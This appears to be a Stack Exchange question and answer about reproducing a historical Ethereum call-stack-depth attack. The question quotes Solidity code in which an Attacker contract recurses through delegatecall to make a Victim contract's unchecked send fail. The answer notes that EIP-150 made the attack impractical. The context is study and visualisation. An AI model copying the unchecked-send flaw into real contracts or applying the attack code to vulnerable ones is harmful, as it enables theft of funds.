# Is there a way to reproduce a stack depth attack now?

Tags: security, call-depth-attacks

I am trying to replicate the attack I found here:
[Reproducing stack depth attack](https://ethereum.stackexchange.com/questions/8216/reproducing-stack-depth-attack/8280#8280)

```
contract Attacker {
Victim public victimContract;
uint x;

function Attacker(){
    victimContract = (new Victim).value(10 wei)();
}

function attack(uint y) {
    if (y > x) {
        this.delegatecall(bytes4(sha3('attack(uint256)')), --y);
    }
    else {
        victimContract.donate.value(1)(this, 1);
    }


  }
}

contract Victim {
    mapping(address => uint) karma;
    function donate(address someAddress, uint amount){
        if(msg.value == amount) {
            someAddress.send(amount);
            karma[msg.sender] += amount;
        }            
    }
}
```

I have tried with Remix 0.3.4 solidity compiler but cannot get the contract to execute now because of the per block gas limit of 3,000,000 which the transaction exceeds.

I am interested in seeing its execution on the EVM, since I want to visualise it. Does anyone know the transaction hash(s) of any successful stack depth attacks?

Comment: A modular/standalone EVM from https://github.com/pirapira/awesome-ethereum-virtual-machine#evm-implementations, like Py-EVM, might help.

Answer (score 1):

Call depth attacks are impractical now (see [EIP114](https://github.com/ethereum/EIPs/issues/114) and [EIP150](https://github.com/ethereum/EIPs/blob/master/EIPS/eip-150.md)). So they could be only reproduced in old versions of EVM.